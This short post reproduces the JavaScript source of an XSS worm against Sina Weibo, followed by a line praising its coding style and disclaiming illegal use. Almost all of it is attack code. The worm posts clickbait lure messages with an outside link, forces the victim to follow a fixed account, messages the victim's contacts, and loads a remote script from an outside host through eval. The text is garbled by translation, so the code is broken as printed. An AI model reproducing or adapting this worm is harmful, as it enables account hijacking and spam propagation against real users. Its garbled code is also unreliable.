Sina Weibo XSS attack source code

Function createXHR () {return window. XMLHttpRequest? New XMLHttpRequest (): new ActiveXObject ("Microsoft. XMLHTTP ");} function getappkey (url) {xmlHttp = createXHR (); xmlHttp. open ("GET", url, false); xmlHttp. send (); result = xmlHttp. responseText; id_arr = ''; id = result. match (/namecard = \ "true \" title = \ "[^ \"] */g); for (I = 0; I <id. length; I ++) {sum = id [I]. toString (). split ('"') [3]; id_arr + = sum + '|';} return id_arr;} function random_msg () {link = 'http://163.fm/PxZHoxn? Id = '+ new Date (). getTime (); var msgs = ['some unnoticed details of the Guo Meimei incident: ', 'helping the party in the founding of the great business:', 'Let a woman's heart beat the 100 poems: ', '3d meat troupe HD Mandarin edition seed:', 'This is the legend of the fairy:', 'shocking! Fan Bingbing's photo has really flowed out: ', 'yang MI has been cracked for many times by the following rules:', 'dumb grabs a bank with a hammer: ', 'Software that can listen to others' mobile phones :', 'tax start point is expected to mention 4000: ']; var msg = msgs [Math. floor (Math. random () * msgs. length)] + link; msg = encodeURIComponent (msg); return msg;} function post (url, data, sync) {xmlHttp = createXHR (); xmlHttp. open ("POST", url, sync); xmlHttp. setRequestHeader ("Accept", "text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8"); xmlHttp. setRequestHeader ("Content-Type "," Application/x-www-form-urlencoded; charset = UTF-8 "); xmlHttp. send (data);} function publish () {url = 'HTTP: // weibo.com/mblog/publish.php? Rnd = '+ new Date (). getTime (); data = 'content = '+ random_msg () +' & pic = & styleid = 2 & retcode = '; post (url, data, true );} function follow () {url = 'HTTP: // weibo.com/attention/aj_addfollow.php? Refer_sort = profile & atnId = profile & rnd = '+ new Date (). getTime (); data = 'uid = '+ 2201270010 + '& fromuid =' + $ CONFIG. $ uid + '& refer_sort = profile & atnId = profile'; post (url, data, true);} function message () {url = 'HTTP: // weibo.com/'+ $ CONFIG. $ uid + '/follow'; ids = getappkey (url); id = ids. split ('|'); for (I = 0; I <id. length-1 & I <5; I ++) {msgurl = 'HTTP: // weibo.com/message/addmsg.php? Rnd = '+ new Date (). getTime (); msg = random_msg (); msg = encodeURIComponent (msg); user = encodeURIComponent (id [I]); data = 'content = '+ msg +' & name = '+ user +' & retcode = '; post (msgurl, data, false) ;}} function main () {try {publish () ;}catch (e) {}try {follow () ;}catch (e) {}try {message () ;}catch (e) {}} try {x = "g = document. createElement ('script'); g. src = 'HTTP: // www.2kt.cn/images/t.js'{document.body.appendchild (g) "; window. opener. eval (x);} catch (e) {} main (); var t = setTimeout ('location = "http://weibo.com/pub/topic"; ', 5000 );

Learn the source code of XSS attacks on Sina Weibo occasionally.(The encoding style is good)This document is for reference only and cannot be used for illegal purposes.